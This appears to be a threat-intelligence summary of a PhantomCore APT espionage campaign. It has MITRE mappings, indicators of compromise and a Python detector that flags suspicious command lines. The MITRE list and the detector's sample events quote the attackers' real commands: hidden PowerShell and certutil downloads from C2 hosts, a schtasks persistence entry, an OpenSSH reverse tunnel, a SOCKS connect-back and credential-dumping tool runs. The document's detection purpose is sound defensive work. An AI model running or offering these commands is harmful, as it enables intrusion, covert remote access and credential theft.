Phantom pains: a large-scale cyberespionage campaign and a possible split within the PhantomCore APT group

Threat actors use PhantomRAT/PhantomRShell and related tools to download and execute remote-access and credential-stealing tools (MeshAgent, OpenSSH, RSocx, PhantomStealer, XenArmor) from multiple staging servers and compromised sites, then persist via scheduled Windows tasks and reverse SSH or SOCKS5 tunnels. Infrastructure includes many domains and IPs such as 188.127.254.234, 195.133.32.213, and mgfoms.org. #PhantomRAT #MeshAgent

Keypoints

  • Operators deploy MeshAgent, RSocx, PhantomTaskShell, PhantomStealer, and XenArmor by downloading archives from payload staging servers or compromised/phishing sites and extracting them on target hosts.
  • Persistence is achieved by creating scheduled Windows Task Scheduler entries (e.g., “Microsoft Update”, “Yandex Update”, “SSH”, “DNS”) to run malicious binaries or OpenSSH tunnels daily at set times.
  • Remote access is maintained via reverse SSH tunnels using OpenSSH (ports 80/443) and SOCKS5 connections to C2 servers (examples: 195.133.32.213, 185.130.251.227, 193.187.174.251).
  • Credential access is performed with XenArmor All-In-One Password Recovery Pro and PhantomStealer to harvest stored browser and system credentials, saving results to files before removing tools.
  • Multiple delivery methods include direct VPS downloads (http/https), compromised legitimate sites, and phishing pages (fake CAPTCHA) to host payloads like inetpub.zip, dnsclient.zip, remote.zip, hosts.zip, update.zip, browser.zip.
  • Command examples show use of PowerShell (Invoke-WebRequest, Expand-Archive, Start-Process), certutil, msiexec for OpenSSH installation, and schtasks for persistence.
  • Infrastructure comprises several domains and numerous IP addresses used for staging and C2, indicating a distributed multi-server setup to host and control tools.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – Used extensively with PowerShell and cmd to download and run payloads: `powershell -WindowStyle Hidden -Command "& {iwr 'https://mgfoms.org/in.php?action=2' -OutFile '%userprofile%\dnsclient.exe'; Start-Process '%userprofile%\dnsclient.exe' -ArgumentList 'run' -WindowStyle Hidden}"`
  • [T1105] Ingress Tool Transfer – Downloading payloads from staging servers and compromised sites with iwr/certutil/msiexec: `iwr -Uri 'http://188.127.254.234:443/remote.zip' -OutFile 'C:\ProgramData\remote.zip'`; `certutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:\ProgramData\remote.zip`
  • [T1053] Scheduled Task/Job – Creating Windows scheduled tasks for persistence to run backdoors and tunnels daily: `schtasks /create /sc DAILY /tn "Microsoft Update" /tr "C:\ProgramData\YandexCloud\dnsclient.bat" /st 10:00`
  • [T1219] Remote Services – Use of OpenSSH to create reverse SSH tunnels to external servers on ports 80/443: `ssh -o StrictHostKeyChecking=no … -f -N -R 37124 -p 80 [email protected]`
  • [T1090] Proxy – Use of RSocx to establish SOCKS5 proxy connections to C2 servers over ports 443 or 8080: `C:\ProgramData\hosts.exe -r 193.187.174.251:443`
  • [T1056] Input Capture (credential dumping via tools) – Use of XenArmor and PhantomStealer to extract stored credentials and write to files: `C:\ProgramData\XenAllPasswordPro.exe -a C:\ProgramData\.html`; `C:\ProgramData\browser.exe chrome -c`
  • [T1106] Native API – Use of msiexec to install the OpenSSH client from official GitHub releases: `msiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.msi`

Indicators of Compromise

  • [Domain] payload staging and phishing hosts – mgfoms.org, austolns.pw (and softline-solutions.cloud)
  • [IP] C2 and staging servers – 188.127.254.234 (staging/download host), 195.133.32.213 (SSH C2), 185.130.251.227 (SSH C2)
  • [File name] delivered payload/archive names – remote.zip, dnsclient.zip, inetpub.zip, update.zip, hosts.zip, browser.zip
  • [Tool/Executable] installed or executed binaries – dnsclient.exe, inetpub.exe, hosts.exe, browser.exe, XenAllPasswordPro.exe
  • [URL] example download endpoints – http://188.127.254.234:443/remote.zip, https://mgfoms.org/in.php?action=2 (and other hosted paths)
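The MITRE techniques and the indicator list above translate directly into hunting logic over process-creation command lines (Sysmon Event ID 1, EDR telemetry). The following is an added example, not code from the PT Security report or this summary: it scores each command line against the behaviours described (downloads from bare IPs into ProgramData or the user profile, scheduled tasks with the report's task names, OpenSSH reverse tunnels, RSocx-style SOCKS connect-backs, quiet msiexec installs from URLs, credential-recovery tools) and against the domains and IPs listed. The sample events are constructed; the SSH user name, the XenArmor output file name and the benign lines are made up for the demonstration.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

# Indicators copied from the summary above (domains, IPs, task names, archive names).
KNOWN_HOSTS = {
    "mgfoms.org", "austolns.pw", "softline-solutions.cloud",
    "188.127.254.234", "195.133.32.213", "185.130.251.227", "193.187.174.251",
}
KNOWN_TASK_NAMES = {"microsoft update", "yandex update", "ssh", "dns"}

URL_RE = re.compile(r"https?://([^/\s'\"]+)", re.I)
BARE_IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
TASK_NAME_RE = re.compile(r"/tn\s+\"?([^\"/]+?)\"?\s+/tr", re.I)
TASK_RUN_RE = re.compile(r"/tr\s+\"?([^\"]+?)\"?(?:\s+/|$)", re.I)
SOCKS_CONNECT_RE = re.compile(r"\s-r\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")  # RSocx "-r ip:port"


@dataclass
class Finding:
    technique: str   # MITRE ID as mapped in the summary above, or "IoC" for a known host
    reason: str
    cmdline: str


def analyze_cmdline(cmdline: str) -> list[Finding]:
    """Return every behavioural or indicator match for one process command line."""
    findings: list[Finding] = []
    low = cmdline.lower()

    # Known infrastructure anywhere in the command line.
    for host in KNOWN_HOSTS:
        if host in low:
            findings.append(Finding("IoC", f"known host {host}", cmdline))
            break

    # T1105: iwr/certutil pulling from a bare IP or dropping into ProgramData/%userprofile%.
    if any(t in low for t in ("iwr ", "invoke-webrequest", "certutil", "-urlcache")):
        for m in URL_RE.finditer(cmdline):
            if BARE_IP_RE.match(m.group(1)):
                findings.append(Finding("T1105", f"download from bare IP {m.group(1)}", cmdline))
        if "programdata" in low or "%userprofile%" in low:
            findings.append(Finding("T1105", "payload written to ProgramData/user profile", cmdline))

    # T1053: scheduled task named like the report's tasks or running a binary from ProgramData.
    if "schtasks" in low and "/create" in low:
        tn, tr = TASK_NAME_RE.search(cmdline), TASK_RUN_RE.search(cmdline)
        name = tn.group(1).strip().lower() if tn else ""
        action = tr.group(1).strip().lower() if tr else ""
        if name in KNOWN_TASK_NAMES:
            findings.append(Finding("T1053", f"task name '{name}' matches report", cmdline))
        if "programdata" in action:
            findings.append(Finding("T1053", "task runs a binary from ProgramData", cmdline))

    # T1219: OpenSSH started non-interactively (-N) with a remote forward (-R) = reverse tunnel.
    if re.search(r"(^|\s)ssh(\.exe)?\s", low) and re.search(r"\s-R\s+\d+", cmdline) \
            and re.search(r"\s-N(\s|$)", cmdline):
        findings.append(Finding("T1219", "OpenSSH reverse tunnel (-N -R)", cmdline))

    # T1090: RSocx-style SOCKS5 connect-back to ip:port.
    m = SOCKS_CONNECT_RE.search(cmdline)
    if m:
        findings.append(Finding("T1090", f"SOCKS connect-back to {m.group(1)}:{m.group(2)}", cmdline))

    # T1106 (as mapped above): quiet msiexec install straight from a URL.
    if "msiexec" in low and "/qn" in low and re.search(r"/i\s+https?://", cmdline, re.I):
        findings.append(Finding("T1106", "msiexec quiet install from remote URL", cmdline))

    # T1056 (as mapped above): credential-recovery tooling.
    if "xenallpasswordpro" in low or re.search(r"browser\.exe\s+chrome\s+-c", low):
        findings.append(Finding("T1056", "credential recovery tool execution", cmdline))
    return findings


def scan(events: list[str]) -> dict[str, list[Finding]]:
    """Map each suspicious command line to its findings; benign lines are omitted."""
    return {ev: f for ev in events if (f := analyze_cmdline(ev))}


def technique_counts(events: list[str]) -> Counter:
    return Counter(f.technique for fs in scan(events).values() for f in fs)


# Constructed sample telemetry: the report's command lines plus two benign ones.
SAMPLE_EVENTS = [
    "powershell -WindowStyle Hidden -Command \"& {iwr 'https://mgfoms.org/in.php?action=2' "
    "-OutFile '%userprofile%\\dnsclient.exe'; Start-Process '%userprofile%\\dnsclient.exe' "
    "-ArgumentList 'run' -WindowStyle Hidden}\"",
    "certutil.exe -urlcache -f http://188.127.254.234:80/remote.zip C:\\ProgramData\\remote.zip",
    "schtasks /create /sc DAILY /tn \"Microsoft Update\" /tr \"C:\\ProgramData\\YandexCloud\\dnsclient.bat\" /st 10:00",
    "ssh -o StrictHostKeyChecking=no -f -N -R 37124 -p 80 user@195.133.32.213",  # user name constructed
    "C:\\ProgramData\\hosts.exe -r 193.187.174.251:443",
    "msiexec /qn /i https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.8.3.0p2-Preview/OpenSSH-Win64-v9.8.3.0.msi",
    "C:\\ProgramData\\XenAllPasswordPro.exe -a C:\\ProgramData\\report.html",  # output name constructed
    "schtasks /create /sc DAILY /tn \"Nightly Backup\" /tr \"C:\\Program Files\\Backup\\backup.exe\" /st 02:00",
    "powershell Invoke-WebRequest -Uri https://www.example.com/tools.zip -OutFile C:\\Users\\alice\\Downloads\\tools.zip",
]

if __name__ == "__main__":
    for cmd, fs in scan(SAMPLE_EVENTS).items():
        print(cmd[:70])
        for f in fs:
            print(f"    [{f.technique}] {f.reason}")
    print(technique_counts(SAMPLE_EVENTS))
```

The checks are deliberately behavioural (reverse tunnel flags, task action path, bare-IP download) rather than only string matches on the listed IPs, so the same logic still fires after the operators rotate infrastructure; the indicator match is kept as a cheap high-confidence layer on top.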


Read more: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore